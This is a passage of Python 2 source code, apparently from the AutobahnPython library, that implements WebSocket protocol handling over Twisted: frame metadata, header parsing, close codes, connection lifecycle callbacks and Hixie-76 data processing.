Thin-wrapper for storing WebSockets frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException():
"""
Throw an instance of this class to deny a WebSockets connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest():
"""
Thin-wrapper for WebSockets connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSockets
client establishes a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to "/myservice".
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to {'foo': ['23', '66'], 'bar': ['2']}.
:type params: dict of arrays of strings
:param version: The WebSockets protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSockets origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSockets (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSockets extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
class ConnectionResponse():
"""
Thin-wrapper for WebSockets connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSockets
client has established a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSockets protocol version that is spoken.
:type version: int
:param protocol: The WebSockets (sub)protocol in use.
:type protocol: str
:param extensions: The WebSockets extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSockets. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSockets initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSockets protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 10
"""
Default WebSockets protocol spec version this implementation speaks.
We use Hybi-10, since this is what is currently targeted by widely distributed
browsers (namely Firefox 8 and the like).
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
QUEUED_WRITE_DELAY = 0.00001
"""For synched/chopped writes, this is the reactor reentry delay in seconds."""
PAYLOAD_LEN_XOR_BREAKEVEN = 128
"""Tuning parameter which chooses XORer used for masking/unmasking based on
payload length."""
MESSAGE_TYPE_TEXT = 1
"""WebSockets text message type (UTF-8 payload)."""
MESSAGE_TYPE_BINARY = 2
"""WebSockets binary message type (arbitrary binary payload)."""
## WebSockets protocol state:
## STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSockets protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSockets handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data_total_length += length
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
else:
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
def onMessageFrameData(self, payload):
"""
Callback when receiving data witin message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (sent by peer) (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
:param reason: None or close reason (when present, a status code MUST have been also be present).
:type reason: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
self.remoteCloseReason = reasonRaw
## reserved close codes: 0-999, 1004, 1005, 1006, 1011-2999, >= 5000
##
if code is not None and (code < 1000 or (code >= 1000 and code <= 2999 and code not in WebSocketProtocol.CLOSE_STATUS_CODES_ALLOWED) or code >= 5000):
if self.protocolViolation("invalid close code %d" % code):
return True
## closing reason
##
if reasonRaw is not None:
## we use our own UTF-8 validator to get consistent and fully conformant
## UTF-8 validation behavior
u = Utf8Validator()
val = u.validate(reasonRaw)
if not val[0]:
if self.invalidPayload("invalid close reason (non-UTF-8 payload)"):
return True
if self.state == WebSocketProtocol.STATE_CLOSING:
## We already initiated the closing handshake, so this
## is the peer's reply to our close frame.
self.wasClean = True
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = True)
else:
## When we are a client, the server should drop the TCP
## If that doesn't happen, we do. And that will set wasClean = False.
reactor.callLater(self.serverConnectionDropTimeout, self.onServerConnectionDropTimeout)
elif self.state == WebSocketProtocol.STATE_OPEN:
## The peer initiates a closing handshake, so we reply
## by sending close frame.
self.wasClean = True
if self.websocket_version == 0:
self.sendCloseFrame(isReply = True)
else:
## Either reply with same code/reason, or code == NORMAL/reason=None
if self.echoCloseCodeReason:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = True)
else:
self.sendCloseFrame(code = WebSocketProtocol.CLOSE_STATUS_CODE_NORMAL, isReply = True)
if self.isServer:
## When we are a server, we immediately drop the TCP.
self.dropConnection(abort = False)
else:
## When we are a client, we expect the server to drop the TCP,
## and when the server fails to do so, a timeout in sendCloseFrame()
## will set wasClean = False back again.
pass
else:
## STATE_CONNECTING, STATE_CLOSED
raise Exception("logic error")
def onServerConnectionDropTimeout(self):
"""
We (a client) expected the peer (a server) to drop the connection,
but it didn't (in time self.serverConnectionDropTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onServerConnectionDropTimeout")
self.wasClean = False
self.wasNotCleanReason = "server did not drop TCP connection (in time)"
self.wasServerConnectionDropTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onServerConnectionDropTimeout since connection is already closed")
def onOpenHandshakeTimeout(self):
"""
We expected the peer to complete the opening handshake with to us.
It didn't do so (in time self.openHandshakeTimeout).
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state == WebSocketProtocol.STATE_CONNECTING:
if self.debugCodePaths:
log.msg("onOpenHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not finish (in time) the opening handshake"
self.wasOpenHandshakeTimeout = True
self.dropConnection(abort = True)
elif self.state == WebSocketProtocol.STATE_OPEN:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is open (opening handshake already finished)")
elif self.state == WebSocketProtocol.STATE_CLOSING:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection is closing")
elif self.state == WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("skipping onOpenHandshakeTimeout since WebSocket connection already closed")
else:
# should not arrive here
raise Exception("logic error")
def onCloseHandshakeTimeout(self):
"""
We expected the peer to respond to us initiating a close handshake. It didn't
respond (in time self.closeHandshakeTimeout) with a close response frame though.
So we drop the connection, but set self.wasClean = False.
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("onCloseHandshakeTimeout fired")
self.wasClean = False
self.wasNotCleanReason = "peer did not respond (in time) in closing handshake"
self.wasCloseHandshakeTimeout = True
self.dropConnection(abort = True)
else:
if self.debugCodePaths:
log.msg("skipping onCloseHandshakeTimeout since connection is already closed")
def dropConnection(self, abort = False):
"""
Drop the underlying TCP connection. For abort parameter, see:
* http://twistedmatrix.com/documents/current/core/howto/servers.html#auto2
* https://github.com/tavendo/AutobahnPython/issues/96
Modes: Hybi, Hixie
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("dropping connection")
self.droppedByMe = True
self.state = WebSocketProtocol.STATE_CLOSED
if False or abort:
self.transport.abortConnection()
else:
self.transport.loseConnection()
else:
if self.debugCodePaths:
log.msg("skipping dropConnection since connection is already closed")
def failConnection(self, code = CLOSE_STATUS_CODE_GOING_AWAY, reason = "Going Away"):
"""
Fails the WebSockets connection.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, the code and reason are silently ignored.
"""
if self.state != WebSocketProtocol.STATE_CLOSED:
if self.debugCodePaths:
log.msg("Failing connection : %s - %s" % (code, reason))
self.failedByMe = True
if self.failByDrop:
## brutally drop the TCP connection
self.wasClean = False
self.wasNotCleanReason = "I failed the WebSocket connection by dropping the TCP connection"
self.dropConnection(abort = True)
else:
## perform WebSockets closing handshake
if self.state != WebSocketProtocol.STATE_CLOSING:
self.sendCloseFrame(code = code, reasonUtf8 = reason.encode("UTF-8"), isReply = False)
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closing")
else:
if self.debugCodePaths:
log.msg("skipping failConnection since connection is already closed")
def protocolViolation(self, reason):
"""
Fired when a WebSockets protocol violation/error occurs.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: Protocol violation that was encountered (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Protocol violation : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_PROTOCOL_ERROR, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def invalidPayload(self, reason):
"""
Fired when invalid payload is encountered. Currently, this only happens
for text message when payload is invalid UTF-8 or close frames with
close reason that is invalid UTF-8.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, reason is silently ignored.
:param reason: What was invalid for the payload (human readable).
:type reason: str
:returns: bool -- True, when any further processing should be discontinued.
"""
if self.debugCodePaths:
log.msg("Invalid payload : %s" % reason)
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_INVALID_PAYLOAD, reason)
if self.failByDrop:
return True
else:
## if we don't immediately drop the TCP, we need to skip the invalid frame
## to continue to later receive the closing handshake reply
return False
def connectionMade(self):
"""
This is called by Twisted framework when a new TCP connection has been established
and handed over to a Protocol instance (an instance of this class).
Modes: Hybi, Hixie
"""
## copy default options from factory (so we are not affected by changed on those)
##
self.debug = self.factory.debug
self.debugCodePaths = self.factory.debugCodePaths
self.logOctets = self.factory.logOctets
self.logFrames = self.factory.logFrames
self.allowHixie76 = self.factory.allowHixie76
self.utf8validateIncoming = self.factory.utf8validateIncoming
self.applyMask = self.factory.applyMask
self.maxFramePayloadSize = self.factory.maxFramePayloadSize
self.maxMessagePayloadSize = self.factory.maxMessagePayloadSize
self.autoFragmentSize = self.factory.autoFragmentSize
self.failByDrop = self.factory.failByDrop
self.echoCloseCodeReason = self.factory.echoCloseCodeReason
self.openHandshakeTimeout = self.factory.openHandshakeTimeout
self.closeHandshakeTimeout = self.factory.closeHandshakeTimeout
self.tcpNoDelay = self.factory.tcpNoDelay
if self.isServer:
self.versions = self.factory.versions
self.webStatus = self.factory.webStatus
self.requireMaskedClientFrames = self.factory.requireMaskedClientFrames
self.maskServerFrames = self.factory.maskServerFrames
else:
self.version = self.factory.version
self.acceptMaskedServerFrames = self.factory.acceptMaskedServerFrames
self.maskClientFrames = self.factory.maskClientFrames
self.serverConnectionDropTimeout = self.factory.serverConnectionDropTimeout
## Set "Nagle"
self.transport.setTcpNoDelay(self.tcpNoDelay)
## the peer we are connected to
self.peer = self.transport.getPeer()
self.peerstr = "%s:%d" % (self.peer.host, self.peer.port)
## initial state
self.state = WebSocketProtocol.STATE_CONNECTING
self.send_state = WebSocketProtocol.SEND_STATE_GROUND
self.data = ""
## for chopped/synched sends, we need to queue to maintain
## ordering when recalling the reactor to actually "force"
## the octets to wire (see test/trickling in the repo)
self.send_queue = deque()
self.triggered = False
## incremental UTF8 validator
self.utf8validator = Utf8Validator()
## track when frame/message payload sizes (incoming) were exceeded
self.wasMaxFramePayloadSizeExceeded = False
self.wasMaxMessagePayloadSizeExceeded = False
## the following vars are related to connection close handling/tracking
# True, iff I have initiated closing HS (that is, did send close first)
self.closedByMe = False
# True, iff I have failed the WS connection (i.e. due to protocol error)
# Failing can be either by initiating close HS or brutal drop (this is
# controlled by failByDrop option)
self.failedByMe = False
# True, iff I dropped the TCP connection (called transport.loseConnection())
self.droppedByMe = False
# True, iff full WebSockets closing handshake was performed (close frame sent
# and received) _and_ the server dropped the TCP (which is its responsibility)
self.wasClean = False
# When self.wasClean = False, the reason (what happened)
self.wasNotCleanReason = None
# When we are a client, and we expected the server to drop the TCP, but that
# didn't happen in time, this gets True
self.wasServerConnectionDropTimeout = False
# When the initial WebSocket opening handshake times out, this gets True
self.wasOpenHandshakeTimeout = False
# When we initiated a closing handshake, but the peer did not respond in
# time, this gets True
self.wasCloseHandshakeTimeout = False
# The close code I sent in close frame (if any)
self.localCloseCode = None
# The close reason I sent in close frame (if any)
self.localCloseReason = None
# The close code the peer sent me in close frame (if any)
self.remoteCloseCode = None
# The close reason the peer sent me in close frame (if any)
self.remoteCloseReason = None
# set opening handshake timeout handler
if self.openHandshakeTimeout > 0:
reactor.callLater(self.openHandshakeTimeout, self.onOpenHandshakeTimeout)
def connectionLost(self, reason):
"""
This is called by Twisted framework when a TCP connection was lost.
Modes: Hybi, Hixie
"""
self.state = WebSocketProtocol.STATE_CLOSED
if not self.wasClean:
if not self.droppedByMe and self.wasNotCleanReason is None:
self.wasNotCleanReason = "peer dropped the TCP connection without previous WebSocket closing handshake"
self.onClose(self.wasClean, WebSocketProtocol.CLOSE_STATUS_CODE_ABNORMAL_CLOSE, "connection was closed uncleanly (%s)" % self.wasNotCleanReason)
else:
self.onClose(self.wasClean, self.remoteCloseCode, self.remoteCloseReason)
def logRxOctets(self, data):
"""
Hook fired right after raw octets have been received, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("RX Octets from %s : octets = %s" % (self.peerstr, binascii.b2a_hex(data)))
def logTxOctets(self, data, sync):
"""
Hook fired right after raw octets have been sent, but only when self.logOctets == True.
Modes: Hybi, Hixie
"""
log.msg("TX Octets to %s : sync = %s, octets = %s" % (self.peerstr, sync, binascii.b2a_hex(data)))
def logRxFrame(self, frameHeader, payload):
"""
Hook fired right after WebSocket frame has been received and decoded, but only when self.logFrames == True.
Modes: Hybi
"""
data = ''.join(payload)
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
data if frameHeader.opcode == 1 else binascii.b2a_hex(data))
log.msg("RX Frame from %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, payload = %s" % info)
def logTxFrame(self, frameHeader, payload, repeatLength, chopsize, sync):
"""
Hook fired right after WebSocket frame has been encoded and sent, but only when self.logFrames == True.
Modes: Hybi
"""
info = (self.peerstr,
frameHeader.fin,
frameHeader.rsv,
frameHeader.opcode,
binascii.b2a_hex(frameHeader.mask) if frameHeader.mask else "-",
frameHeader.length,
repeatLength,
chopsize,
sync,
payload if frameHeader.opcode == 1 else binascii.b2a_hex(payload))
log.msg("TX Frame to %s : fin = %s, rsv = %s, opcode = %s, mask = %s, length = %s, repeat_length = %s, chopsize = %s, sync = %s, payload = %s" % info)
def dataReceived(self, data):
"""
This is called by Twisted framework upon receiving data on TCP connection.
Modes: Hybi, Hixie
"""
if self.logOctets:
self.logRxOctets(data)
self.data += data
self.consumeData()
def consumeData(self):
"""
Consume buffered (incoming) data.
Modes: Hybi, Hixie
"""
## WebSocket is open (handshake was completed) or close was sent
##
if self.state == WebSocketProtocol.STATE_OPEN or self.state == WebSocketProtocol.STATE_CLOSING:
## process until no more buffered data left or WS was closed
##
while self.processData() and self.state != WebSocketProtocol.STATE_CLOSED:
pass
## WebSocket needs handshake
##
elif self.state == WebSocketProtocol.STATE_CONNECTING:
## the implementation of processHandshake() in derived
## class needs to perform client or server handshake
## from other party here ..
##
self.processHandshake()
## we failed the connection .. don't process any more data!
##
elif self.state == WebSocketProtocol.STATE_CLOSED:
## ignore any data received after WS was closed
##
if self.debugCodePaths:
log.msg("received data in STATE_CLOSED")
## should not arrive here (invalid state)
##
else:
raise Exception("invalid state")
def processHandshake(self):
"""
Process WebSockets handshake.
Modes: Hybi, Hixie
"""
raise Exception("must implement handshake (client or server) in derived class")
def registerProducer(self, producer, streaming):
"""
Register a Twisted producer with this protocol.
Modes: Hybi, Hixie
:param producer: A Twisted push or pull producer.
:type producer: object
:param streaming: Producer type.
:type streaming: bool
"""
self.transport.registerProducer(producer, streaming)
def _trigger(self):
"""
Trigger sending stuff from send queue (which is only used for chopped/synched writes).
Modes: Hybi, Hixie
"""
if not self.triggered:
self.triggered = True
self._send()
def _send(self):
"""
Send out stuff from send queue. For details how this works, see test/trickling
in the repo.
Modes: Hybi, Hixie
"""
if len(self.send_queue) > 0:
e = self.send_queue.popleft()
if self.state != WebSocketProtocol.STATE_CLOSED:
self.transport.write(e[0])
if self.logOctets:
self.logTxOctets(e[0], e[1])
else:
if self.debugCodePaths:
log.msg("skipped delayed write, since connection is closed")
# we need to reenter the reactor to make the latter
# reenter the OS network stack, so that octets
# can get on the wire. Note: this is a "heuristic",
# since there is no (easy) way to really force out
# octets from the OS network stack to wire.
reactor.callLater(WebSocketProtocol.QUEUED_WRITE_DELAY, self._send)
else:
self.triggered = False
def sendData(self, data, sync = False, chopsize = None):
"""
Wrapper for self.transport.write which allows to give a chopsize.
When asked to chop up writing to TCP stream, we write only chopsize octets
and then give up control to select() in underlying reactor so that bytes
get onto wire immediately. Note that this is different from and unrelated
to WebSockets data message fragmentation. Note that this is also different
from the TcpNoDelay option which can be set on the socket.
Modes: Hybi, Hixie
"""
if chopsize and chopsize > 0:
i = 0
n = len(data)
done = False
while not done:
j = i + chopsize
if j >= n:
done = True
j = n
self.send_queue.append((data[i:j], True))
i += chopsize
self._trigger()
else:
if sync or len(self.send_queue) > 0:
self.send_queue.append((data, sync))
self._trigger()
else:
self.transport.write(data)
if self.logOctets:
self.logTxOctets(data, False)
def sendPreparedMessage(self, preparedMsg):
"""
Send a message that was previously prepared with
WebSocketFactory.prepareMessage().
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
self.sendData(preparedMsg.payloadHixie)
else:
self.sendData(preparedMsg.payloadHybi)
def processData(self):
"""
After WebSockets handshake has been completed, this procedure will do all
subsequent processing of incoming bytes.
Modes: Hybi, Hixie
"""
if self.websocket_version == 0:
return self.processDataHixie76()
else:
return self.processDataHybi()
def processDataHixie76(self):
"""
Hixie-76 incoming data processing.
Modes: Hixie
"""
buffered_len = len(self.data)
## outside a message, that is we are awaiting data which starts a new message
##
if not self.inside_message:
if buffered_len >= 2:
## new message
##
if self.data[0] == '\x00':
self.inside_message = True
if self.utf8validateIncoming:
self.utf8validator.reset()
self.utf8validateIncomingCurrentMessage = True
self.utf8validateLast = (True, True, 0, 0)
else:
self.utf8validateIncomingCurrentMessage = False
self.data = self.data[1:]
self.onMessageBegin(1)
## Hixie close from peer received
##
elif self.data[0] == '\xff' and self.data[1] == '\x00':
self.onCloseFrame()
self.data = self.data[2:]
# stop receiving/processing after having received close!
return False
## malformed data
##
else:
if self.protocolViolation("malformed data received"):
return False
else:
## need more data
return False
end_index = self.data.find('\xff')
if end_index > 0:
payload = self.data[:end_index]
self.data = self.data[end_index + 1:]
else:
payload = self.data
self.data = ''
## incrementally validate UTF-8 payload
##
if self.utf8validateIncomingCurrentMessage:
self.utf8validateLast = self.utf8validator.validate(payload)
